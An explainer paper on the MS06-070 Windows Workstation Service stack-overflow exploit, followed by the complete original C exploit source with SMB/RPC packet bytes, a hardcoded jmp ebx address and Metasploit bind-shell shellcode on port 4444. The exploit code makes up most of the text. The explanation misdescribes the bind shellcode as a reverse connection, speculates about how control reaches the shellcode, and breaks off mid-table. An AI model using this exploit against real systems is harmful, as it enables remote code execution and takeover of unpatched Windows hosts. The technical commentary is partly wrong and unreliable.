Understanding the MS06-070 NetpManageIPCConnect Stack Overflow Exploit

What this paper is

This paper details an exploit developed by "cocoruder" for a stack overflow vulnerability in Microsoft Windows' Wkssvc (Workstation Service), specifically within the NetrJoinDomain2 function. The exploit targets older versions of Windows, particularly Windows 2000 Server SP4 (Chinese version), and allows an attacker to remotely execute arbitrary code on a vulnerable system. The vulnerability is related to how the NetpManageIPCConnect function handles certain network requests, leading to a buffer overflow when processing malformed input.

Simple technical breakdown

The exploit works by sending a specially crafted sequence of SMB (Server Message Block) network packets to a target Windows machine. These packets aim to:

1. Establish an SMB connection: This involves a series of SMB negotiation, session setup, and tree connect requests.
2. Initiate an RPC (Remote Procedure Call) session: The exploit binds to the wkssvc (Workstation Service) RPC interface.
3. Trigger the vulnerability: A malformed NetrJoinDomain2 RPC call is sent. This call contains an overly long string that overflows a buffer on the stack.
4. Overwrite the return address: The overflow is designed to overwrite the function's return address on the stack with a pointer to the attacker's shellcode.
5. Execute shellcode: When the vulnerable function attempts to return, it instead jumps to the attacker's shellcode, allowing for arbitrary code execution.

The shellcode provided in this exploit is a Metasploit-generated payload designed to create a reverse TCP connection back to the attacker on port 4444.

Complete code and payload walkthrough

The C code provided implements the exploit by constructing and sending a series of SMB and RPC packets. Let's break down the key components:

1. Data Structures and Global Variables:

• SmbNeg[]: An array of bytes representing an SMB Negotiate Protocol Request. This is the initial packet sent to start an SMB session.
• Session_Setup_AndX_Request[]: An array of bytes for an SMB Session Setup AndX Request. This establishes the authenticated session.
• TreeConnect_AndX_Request[]: An array of bytes for an SMB Tree Connect AndX Request. This connects to a specific resource (like a share).
• NTCreate_AndX_Request[]: An array of bytes for an SMB NT Create AndX Request. This is used to create or open a file/object.
• Rpc_Bind_Wkssvc[]: An array of bytes representing an RPC Bind request for the wkssvc interface.
• Rpc_NetrJoinDomain2_Header[]: The header part of the crafted RPC NetrJoinDomain2 request, which contains the vulnerable parameters.
• Rpc_NetrJoinDomain2_End[]: The trailer part of the crafted RPC NetrJoinDomain2 request.
• lpDomainName: A pointer to the domain name string, converted to a wide character string.
• dwDomainNameLen: The length of the wide character domain name.
• shellcode[]: The actual shellcode bytes to be executed on the target. This is a Metasploit-generated payload for a reverse TCP bind.
• fill_len_1, fill_len_2: DWORDs defining lengths for padding and junk data.
• addr_jmp_ebx: A hardcoded address (0x77f81573) in ntdll.dll that points to a jmp ebx instruction. This is used to transfer control to the shellcode.
• code_jmp8[]: A small sequence of bytes (\xEB\x06\x90\x90) that performs a short jump, used as a trampoline.
• Rpc_NetrJoinDomain2: A pointer to the fully constructed RPC NetrJoinDomain2 packet.
• dwRpc_NetrJoinDomain2: The total size of the constructed RPC packet.
• recvbuff[]: A buffer to store responses from the target.

2. Functions:

• showinfo(): Prints usage information and details about the exploit.
• neg(int s): Sends the SmbNeg (SMB Negotiate) packet to the given socket s.
• MakeAttackPacket(char *lpDomainNameStr): This is the core function for constructing the exploit packet.
  • It takes the target domain name as input.
  • It converts the ASCII domain name to a wide character string (lpDomainName).
  • It appends two backslashes (\\) to the domain name, which is part of the expected format.
  • It calculates the total length (len) of the data that will be part of the overflow, including the wide character domain name, padding, the jmp 8 instruction, the jmp ebx address, the shellcode, and additional junk data.
  • It determines the total size (dwRpc_NetrJoinDomain2) of the final RPC packet, including the header and end parts.
  • It allocates memory for the Rpc_NetrJoinDomain2 packet.
  • It initializes the packet with NOP sleds (0x90).
  • It updates specific fields in Rpc_NetrJoinDomain2_Header (like para1 length) to reflect the calculated len.
  • It copies the Rpc_NetrJoinDomain2_Header.
  • It copies the prepared lpDomainName.
  • It calculates an offset and copies code_jmp8 (the jmp 8 trampoline).
  • It places the addr_jmp_ebx (the jmp ebx instruction) at the calculated offset, effectively pointing to the shellcode.
  • It copies the shellcode.
  • It fills the remaining space with junk data (0x41).
  • It appends null bytes (0x00) to ensure proper alignment if needed.
  • It copies the Rpc_NetrJoinDomain2_End.
• main(int argc, char **argv): The entry point of the program.
  • Initializes Winsock.
  • Creates a TCP socket.
  • Connects to the target IP address on port 445 (SMB).
  • Sends the SmbNeg packet.
  • Receives the SMB negotiation response.
  • Sends the Session_Setup_AndX_Request.
  • Receives the session setup response and extracts the userid.
  • Updates TreeConnect_AndX_Request with the obtained userid.
  • Sends the TreeConnect_AndX_Request.
  • Receives the tree connect response and extracts the treeid.
  • Updates NTCreate_AndX_Request with userid and treeid.
  • Sends the NTCreate_AndX_Request.
  • Receives the NT Create response and extracts the fid (File ID).
  • Updates Rpc_Bind_Wkssvc with userid, treeid, and fid. It also sets the SMB header length.
  • Sends the Rpc_Bind_Wkssvc packet.
  • Receives the RPC bind response.
  • Calls MakeAttackPacket to construct the final exploit payload using the provided domain name.
  • Updates Rpc_NetrJoinDomain2 with userid, treeid, fid, and various length fields within the RPC packet header to match the constructed payload size.
  • Sends the crafted Rpc_NetrJoinDomain2 packet.
  • Receives a final response (likely indicating success or failure).
  • Closes the socket.

3. Shellcode Analysis:

The shellcode array contains the actual payload. Based on the comment /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */, this is a Metasploit-generated win32_bind shellcode.

• Purpose: To establish a reverse TCP connection back to the attacker on a specified port (4444 in this case) and then spawn a command shell.
• Functionality:
  • It typically starts by resolving necessary Windows API functions (like socket, connect, CreateProcess, etc.) using techniques like PEB walking or hashing.
  • It then creates a socket.
  • It attempts to connect to the attacker's IP address and port (the attacker would be listening on port 4444).
  • Upon successful connection, it duplicates the socket handle to standard input, output, and error, effectively redirecting the command shell's I/O to the network connection.
  • Finally, it executes cmd.exe or a similar shell.
• Encoding: The comment mentions Encoder=PexFnstenvSub, indicating it was likely encoded to evade simple signature-based detection.
• EXITFUNC=seh: This means the shellcode is designed to use Structured Exception Handling (SEH) to exit cleanly, which is a common technique for shellcode to avoid crashing the process if it fails or finishes.

4. Exploit Packet Construction (MakeAttackPacket):

The critical part of the exploit is how MakeAttackPacket crafts the Rpc_NetrJoinDomain2 payload.

• Vulnerability Trigger: The NetrJoinDomain2 function in wkssvc.dll is vulnerable. When processing the DomainName parameter, it copies it into a fixed-size buffer on the stack without proper bounds checking. By providing a sufficiently long DomainName, an attacker can overwrite subsequent data on the stack, including the return address.

• Payload Structure:

  • Rpc_NetrJoinDomain2_Header: Contains the initial RPC and SMB headers, including fields that will be updated to reflect the payload size.
  • lpDomainName: The wide-character string representing the domain name, padded and extended. This is the primary overflow data.
  • code_jmp8: A small JMP instruction.
  • addr_jmp_ebx: The JMP EBX instruction from ntdll.dll. The EBX register will be set by the preceding code to point to the shellcode.
  • shellcode: The actual payload to be executed.
  • fill_len_2 (junk data): Padding to fill the rest of the buffer up to the point where the stack is expected to be.
  • 0x0000 (or 0x00): Null termination or padding.
  • Rpc_NetrJoinDomain2_End: The trailer of the RPC packet.

• Control Flow Hijacking:

  1. The NetrJoinDomain2 function is called with the crafted, oversized DomainName.
  2. The DomainName data overflows the stack buffer.
  3. The overflow overwrites the return address.
  4. The exploit places code_jmp8 (a short jump) followed by addr_jmp_ebx (a JMP EBX instruction) in the overflowed data.
  5. Crucially, the MakeAttackPacket function calculates the offset to place addr_jmp_ebx such that when the function returns, it jumps to addr_jmp_ebx.
  6. Before the NetrJoinDomain2 function is called, the exploit likely sets up the stack frame such that EBX will point to the shellcode when the JMP EBX instruction is executed. The jmp 8 instruction might be a small trampoline to help align the execution flow or ensure EBX is correctly set before the final jump. (The exact mechanism for setting EBX is not explicitly detailed in the C code but is a common pattern in such exploits).
  7. The JMP EBX instruction then transfers control to the shellcode.

Mapping of Code Fragments to Practical Purpose:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

/***************************************************************************

Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit

by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp

successfully test on Windows 2000 Server SP4(chinese)

usage:
ms06070 targetip DomainName

notice:
Make sure the DomainName is valid and live,more informations see
http://research.eeye.com/html/advisories/published/AD20061114.html,
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>


unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";


unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";


unsigned char TreeConnect_AndX_Request[]=
"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
"\x3f\x00";


unsigned char NTCreate_AndX_Request[]=
"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";


unsigned char Rpc_Bind_Wkssvc[]=
"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";


unsigned char Rpc_NetrJoinDomain2_Header[]=
"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
"\x00\x00\x00\x00"
"\x16\x00"     //opnum,NetrJoinDomain2
"\x30\x2a\x42\x00"
"\x0e\x00\x00\x00"
"\x00\x00\x00\x00"
"\x0e\x00\x00\x00"
"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
"\x00\x00"
"\x10\x01\x00\x00"
"\x00\x00\x00\x00"
"\x10\x01\x00\x00";


unsigned char Rpc_NetrJoinDomain2_End[]=
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x01\x00\x00\x00";


unsigned char *lpDomainName=NULL;
DWORD   dwDomainNameLen=0;



/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
http://metasploit.com */
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
"\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
"\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
"\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
"\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
"\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
"\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
"\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
"\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
"\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
"\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
"\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
"\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
"\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
"\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
"\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
"\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
"\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
"\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
"\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
"\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
"\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";


DWORD    fill_len_1 =0x84c;     //fill data
DWORD    fill_len_2 =0x1000;    //fill rubbish data
DWORD    addr_jmp_ebx=0x77f81573;   //jmp ebx address,in ntdll.dll
unsigned char  code_jmp8[]=      //jmp 8
"\xEB\x06\x90\x90";

unsigned char  *Rpc_NetrJoinDomain2=NULL;
DWORD    dwRpc_NetrJoinDomain2=0;


unsigned char  recvbuff[2048];


void showinfo(void)
{
 printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
 printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
 printf("page:http://ruder.cdut.net/default.asp\n\n");
 printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
 printf("usage:\n");
 printf("ms06070 targetip DomainName\n\n");
 printf("notice:\n");
 printf("Make sure the DomainName is valid and live,more informations
see\n");
printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
 printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");

}

void neg ( int s )
{
 char response[1024];

 memset(response,0,sizeof(response));

 send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}



void MakeAttackPacket(char *lpDomainNameStr)
{
 DWORD  j,len,b_flag;



 dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
 lpDomainName=(unsigned char *)malloc(dwDomainNameLen);

 memset(lpDomainName,0,dwDomainNameLen);

MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);

 *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
 *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;

 len=dwDomainNameLen+     //DomainName
 fill_len_1-3*2+      //fill_len_1
 4+         //jmp 8
 4+         //addr jmp ebx
 sizeof(shellcode)-1+    //shellcode
 fill_len_2+       //fill_len_2
 2;         //0x0000

 b_flag=0;
 if (len%2==1)
 {
 len++;
 b_flag=1;
 }


 dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
       len+
       sizeof(Rpc_NetrJoinDomain2_End)-1; //end


 //malloc
 Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
 if (Rpc_NetrJoinDomain2==NULL)
 {
 printf("malloc error!\n");
 return;
 }

 //fill nop
 memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);


 j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

 //update para1 length
 *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
 *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;


 //copy header

memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);

 j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

 //copy DomainName
 memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
 j=j+dwDomainNameLen;

 //calculate offset
 j=j+fill_len_1-3*2;

 //jmp 8
 memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
 j=j+4;

 //jmp ebx address
 *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
 j=j+4;

 //copy shellcode
 memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
 j=j+sizeof(shellcode)-1;

 //fill data
 memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
 j=j+fill_len_2;

 //0x0000(NULL)
 if (b_flag==0)
 {
 Rpc_NetrJoinDomain2[j]=0x00;
 Rpc_NetrJoinDomain2[j+1]=0x00;
 j=j+2;
 }
 else if (b_flag==1)
 {
 Rpc_NetrJoinDomain2[j]=0x00;
 Rpc_NetrJoinDomain2[j+1]=0x00;
 Rpc_NetrJoinDomain2[j+2]=0x00;
 j=j+3;
 }


 //copy other parameter

memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);

 j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;


}



void main(int argc,char **argv)
{
 WSADATA    ws;
 struct sockaddr_in server;
   SOCKET    sock;
 DWORD    ret;
 WORD    userid,treeid,fid;


 showinfo();

 return;

 WSAStartup(MAKEWORD(2,2),&ws);




   sock = socket(AF_INET,SOCK_STREAM,0);
   if(sock<=0)
 {
       return;
 }

   server.sin_family = AF_INET;
   server.sin_addr.s_addr = inet_addr(argv[1]);
   server.sin_port = htons((USHORT)445);

 printf("[+] Connecting %s\n",argv[1]);

   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
 if (ret==-1)
 {
 printf("connect error!\n");
 return;
 }


 neg(sock);

 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send Session_Setup_AndX_Request error!\n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 userid=*(WORD *)(recvbuff+0x20);       //get userid


 memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid


 ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send TreeConnect_AndX_Request error!\n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 treeid=*(WORD *)(recvbuff+0x1c);       //get treeid


 //send NTCreate_AndX_Request
 memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
 memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid


 ret=send(sock,(char
*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send NTCreate_AndX_Request error!\n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


 fid=*(WORD *)(recvbuff+0x2a);        //get fid


 //rpc bind

 memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
 memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
 memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
 *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);

 ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
 if (ret<=0)
 {
 printf("send Rpc_Bind_Wkssvc error!\n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


 MakeAttackPacket((char *)argv[2]);


 memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
 memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
 memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
 *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);

 *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length

 ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
 if (ret<=0)
 {
 printf("send Rpc_NetrJoinDomain2 error!\n");
 return;
 }

 printf("[+] Send attack packet successfully.telnet %s:4444?\n",argv[1]);

 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);




 closesocket(sock);

}

// milw0rm.com [2006-11-16]